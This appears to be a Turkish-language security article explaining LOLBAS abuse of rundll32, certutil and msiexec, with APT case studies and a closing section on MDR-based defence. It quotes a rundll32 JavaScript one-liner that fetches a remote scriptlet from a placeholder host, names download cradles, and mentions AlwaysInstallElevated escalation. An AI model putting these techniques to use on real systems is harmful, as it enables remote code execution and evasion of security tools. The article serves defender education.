
LOLBAS, işletim sistemlerinin içerisinde önceden mevcut olan araçların ve yürütülebilir dosyaların kötüye kullanılmasını ifade eder. Bu faaliyetler, özellikle Microsoft tarafından imzalanmış ve işletim sisteminin doğal bir parçası olan veya Microsoft tarafından sağlanan dosyalar aracılığıyla gerçekleştirilir. Bu tür bir dosya veya skriptin, beklenmeyen ek işlevselliğe sahip olması ve ileri düzey kalıcı tehditler (APT) veya kırmızı takımlar tarafından faydalı olacak işlevselliği barındırması gerekir.
LOLBins, saldırganların, ağ içerisinde hareket etmek, ayrıcalık yükseltmek ya da sistem üzerinde kalıcılık sağlamak gibi kötü niyetli faaliyetleri gerçekleştirmek için kullanabileceği, işletim sistemlerine özgü meşru yürütülebilir dosya ve ikililerdir. Bu araçlar, geleneksel güvenlik önlemlerince genellikle görmezden gelinir ve kötü amaçlı aktiviteleri tespit etmek zorlaşır. Zaman içinde, LOLBinler kavramı genişleyerek skript ve kütüphaneleri de kapsayacak şekilde evrilmiş ve böylece “LOLBAS” terimi ortaya çıkmıştır.
Sıklıkla Kullanılan Bazı LOLBins’ler
System Binary Proxy Execution: Rundll32
Saldırganlar, kötü amaçlı kodları yürütme sürecinde rundll32.exe dosyasını bir aracı olarak kullanabilirler. Rundll32.exe, doğrudan yürütme işlemlerine alternatif olarak tercih edilir çünkü güvenlik yazılımları tarafından bazen göz ardı edilen veya normal işlemler sırasında yanlış pozitiflere yol açabilecek izin listeleri nedeniyle bu süreç izlenmeyebilir. Bu dosya, genellikle DLL yüklerinin çalıştırılmasında kullanılır (örneğin, rundll32.exe {DLLadı, DLLfonksiyonu} şeklinde).
Rundll32.exe, aynı zamanda, belgelenmemiş shell32.dll fonksiyonları olan Control_RunDLL ve Control_RunDLLAsUser üzerinden Kontrol Paneli Öğe dosyalarını (.cpl) çalıştırmak için de kullanılabilir. Bir .cpl dosyasına çift tıklamak, rundll32.exe tarafından yürütülmesini tetikler.
Ayrıca, rundll32, JavaScript gibi betik dillerinin yürütülmesinde de kullanılabilir. Bu işlem, rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:https[:]//www[.]example[.]com/kötücül.sct”)” gibi bir sözdizimi kullanılarak gerçekleştirilebilir ve bu kullanım, Poweliks gibi zararlı yazılımlarda gözlemlenmiştir.
Saldırganlar, rundll32.exe’nin DLL fonksiyon adlarını yükleme yöntemini de kötüye kullanarak, kötü niyetli kodların analizden saklanmasını hedefleyebilirler. Windows’un çeşitli karakter setlerini destekleme özelliği kapsamında, rundll32.exe öncelikle geniş/Unicode ardından ANSI karakter destekli fonksiyonları kontrol ederek belirli bir fonksiyonu yükler. Bu, saldırganların, zararsız fonksiyon adlarına W ve/veya A ekleyerek birden fazla benzer dışa aktarılmış fonksiyon adı oluşturarak kötü niyetli kodları gizlemelerine olanak tanır. [3][4] DLL fonksiyonları, aynı zamanda sıralı numaralarla da dışa aktarılıp yürütülebilir (örneğin, rundll32.exe dosya.dll,#1).
Bunun yanı sıra, saldırganlar, kötü niyetli yüklerin daha da gizlenmesi için DLL dosya adlarını, dosya uzantılarını veya fonksiyon adlarını değiştirme gibi Maskeleme tekniklerini de kullanabilirler. Bu yaklaşımlar, kötü niyetli faaliyetlerin, meşru süreçler arasında kaybolup güvenlik çözümleri tarafından tespit edilmesini zorlaştırır.
APT Senaryo Örneği – 2015 Ukraine Electric Power Attack
2015 yılında Ukrayna’nın elektrik altyapısına yönelik gerçekleştirilen saldırı, Sandworm Ekibi’nin öncülük ettiği bir kampanyanın parçasıydı. Bu kampanyada, özellikle BlackEnergy3 ve KillDisk olmak üzere zararlı yazılımlar kullanılarak, ülkenin elektrik dağıtım ağının iletim ve dağıtım alt istasyonları hedef alındı. Sandworm Ekibi tarafından Ukrayna elektrik şebekesine karşı yapılan bu eylem, ekip adına kamuoyuna duyurulan ilk önemli saldırı niteliğini taşımaktadır. Saldırının ilk evresinde, BlackEnergy zararlı yazılımının kullanıldığı düşünülmektedir. Bu kötü niyetli yazılım, enerji şirketlerindeki spesifik kişilere yönelik, zararlı ekler içeren e-postalar vasıtasıyla gönderilerek yönetici erişim bilgilerinin ele geçirilmesi ve alt istasyon ağlarına sızılması hedeflenmiştir.
Kampanyanın ikinci aşamasında ise, bilgisayarların sabit disklerinin belirli bölümlerini silerek sistemlerin yeniden başlamasını engelleyen ve sonuç olarak elektrik kesintilerine sebep olan KillDisk isimli yıkıcı zararlı yazılım devreye sokulmuştur. Kampanya, müşterilerin kesintileri bildirmesinin önüne geçmek amacıyla müşteri hizmetleri çağrı merkezlerine yönelik gerçekleştirilen bir telefoni hizmeti reddi (TDoS) saldırısı ile son bulmuştur. Saldırısı sırasında, Sandworm Takımı, bir DLL’i rundll32.exe kullanarak çalıştırabilen bir arka kapı kullandı.
Ingress Tool Transfer: Certutil.exe
Saldırganlar, harici sistemlerden zafiyete uğramış ortamlara araçlar ya da dosyalar transfer edebilirler. Bu tür transferler, komuta kontrol kanalı ya da FTP gibi alternatif protokoller aracılığıyla, saldırganın kontrolündeki dış sistemlerden hedef ağa dosya kopyalama yoluyla gerçekleştirilebilir. Varış noktasına ulaştıktan sonra, saldırganlar bu araçları zafiyete uğramış ortam içerisindeki diğer cihazlara da dağıtabilirler, bu işleme Yanal Araç Transferi denir.
Windows işletim sisteminde, saldırganlar çeşitli yardımcı programlar aracılığıyla araçları indirebilirler; örneğin, copy, finger, certutil, IEX(New-Object Net.WebClient).downloadString() ve Invoke-WebRequest gibi PowerShell komutları. Linux ve macOS işletim sistemlerinde de, araçları indirmek için curl, scp, sftp, tftp, rsync, finger ve wget gibi çeşitli yardımcı programlar mevcuttur.
Saldırganlar, araçları hedef sunuculara indirmek amacıyla yum veya winget gibi yükleyici ve paket yöneticilerini de kötüye kullanabilirler.
Dosyalar, çeşitli web hizmetleri ya da hedef sistemde zaten bulunan veya başka araçlar kullanılarak da transfer edilebilir. Özellikle, saldırganlar Dropbox veya OneDrive gibi, web tabanlı istemci ile yerel istemci arasında senkronizasyon sağlayan hizmetleri kullanarak hedef sistemlere dosya transferi gerçekleştirebilirler. Örneğin, bir bulut hesabının güvenliğini ihlal edip, ilgili hizmetin web portalına erişim sağlayarak, hedef makineye dosyanın aktarılmasını sağlayan otomatik bir senkronizasyon sürecini tetikleyebilirler. Bu yaklaşımlar, saldırganların zafiyete uğramış ortamlarda etkinliğini ve hareket kabiliyetini artırır.
APT Senaryo Örneği – C0017
Mayıs 2021’den Şubat 2022’ye kadar süren C0017, APT41 tarafından yürütülen ve ABD’nin altı eyalet hükümeti ağının, internet üzerinden erişilebilen web uygulamalarındaki güvenlik açıklarının kötüye kullanılması sonucu başarılı bir şekilde sızılmasını içeren bir operasyondur. Bu operasyon süresince, APT41, ilk erişim metodları olarak hem kamuoyuna duyurulan hem de henüz bilinmeyen güvenlik açıklarını etkin bir şekilde kullanmış, düzeltme girişimlerinden sonra kurbanları en az iki kez daha sızma eylemleriyle karşı karşıya bırakmıştır. C0017 operasyonunun asıl amaçları açıkça bilinmese de, APT41’in operasyon sırasında Kişisel Tanımlanabilir Bilgileri (PII) ele geçirip dışa aktardığı tespit edilmiştir.
System Binary Proxy Execution: Msiexec
Windows’un yükleyici işlevlerini yönetmek amacıyla tasarlanan msiexec.exe, komut satırı aracılığıyla .msi uzantılı kurulum paketlerini işletmek için kullanılır. Bu araç, Microsoft tarafından sağlanan bir dijital imza ile güvenilirliğini pekiştirir. Ancak, kötü amaçlı faaliyetlerde bulunan kişiler, bu güvenilir mekanizmayı, hem yerel hem de ağ üzerinden erişilebilen MSI dosyalarını etkinleştirmek üzere kötüye kullanabilirler. Özellikle, msiexec.exe’nin DLL dosyalarını da çalıştırabilme yeteneği, onu zararlı yazılımların bulaştırılması ve yayılması için cazip bir araç haline getirir. Bu işlemin başarısı, msiexec.exe’nin Windows sistemlerinde yerleşik ve imzalı bir bileşen olması ve bazı uygulama kontrol mekanizmalarının bu potansiyel tehdidi yeterince değerlendirmemesi nedeniyle daha da artmaktadır. Ayrıca, sistem yöneticileri tarafından AlwaysInstallElevated politikasının etkinleştirilmesi durumunda, bu aracın çalıştırılması sistem ayrıcalıklarına yükseltilebilir, böylece kötü niyetli yazılımların daha geniş bir zarar verme kapasitesine sahip olması mümkün hale gelir. Bu durum, güvenlik açısından ciddi riskler taşır ve uygulama kontrol politikalarının gözden geçirilmesini gerektirir.
APT Senaryo Örneği – IcedID
Özellikle bankaları hedef alan IcedID APT grubu COVID-19 döneminde phishing kampanyalarıyla pek çok saldırıda bulundu. Email gönderen isimlerinde ve ek isimlerinde COVID-19 ve FMLA gibi anahtar kelimeler kullanarak inandırıcılığını arttıran grup, finansal bilgileri çalmak için Man-in-the-Browser saldırıları gerçekleştiren bir bankacılık zararlı yazılımını kullanmaktadır. Yazılım sistem içerisinde kendini gizlemek ve modüllerini ile konfigürasyonlarını indirmek için msiexec.exe içine kendini enjekte etmektedir.
msiexec.exe içine enjekte edilen kod ile CnC (Command and Control) sunucusuyla bağlantı kurulur ve çeşitli komutlar alınması sağlanır. IcedID’nin çekirdeğinin ana işlevi, webinjects kullanarak finansal verileri çalmaktır. msiexec sürecine enjekte edilen IcedID ana modülü, belirli tarayıcı süreçleri izlenir ve tarayıcıya yapılan tüm bağlantılar msiexec.exe’ye yönlendirilir ve tarayıcının tam kontrolünü sağlar.
LOL Saldırılarına Karşı Savunma
Siber güvenlik ortamının sürekli evrim geçirdiği bir dünyada, organizasyonlar karmaşık tehditlere karşı durmaksızın mücadele etmektedir. Bu bağlamda, çok katmanlı savunma stratejileri, tehditlere karşı etkin bir mücadele için elzemdir. Bu stratejilerin güçlü bir örneği, yönetilen algılama ve yanıt (MDR) hizmetlerinin, saldırganların meşru görünen yürütülebilir dosyaları kötü amaçlı eylemler için kullanımını içeren LOLBAS kavramıyla birleştirilmesidir. MDR ve LOL saldırıları hakkında derinlemesine bilgi sahibi olmak, organizasyonların siber güvenlik duruşlarını ve dayanıklılıklarını güçlendirir.
MDR, sürekli tehdit izleme ve algılama, olay incelemesi yapma ve güvenlik olaylarına etkin yanıt verme yeteneği sunan bir siber güvenlik hizmetidir. Bu hizmet, tehdit avlama, sürekli izleme ve siber güvenlik profesyonellerine erişim gibi olanaklar sağlayarak organizasyonlara değer katar.
MDR’nin başarılı olabilmesi için, güvenlik ekiplerinin LOLBAS’ın varlığından ve işletim sistemlerinde nasıl kullanıldığından haberdar olması gerekmektedir. LOLBAS aktivitelerini izlemek ve analiz etmek, anomali veya şüpheli davranışları belirleyerek potansiyel saldırıları öngörmeyi mümkün kılar.
Bu bağlamda, uygulama kontrolü, davranış izleme ve anomali tespiti gibi yöntemler, LOLBAS’ın kötüye kullanımını saptayarak müdahale etmek için kullanılabilir. Bu yaklaşım, organizasyonların siber tehditlere karşı korunmasını güçlendirirken, aynı zamanda siber güvenlik çabalarını daha etkin ve kapsamlı hale getirir.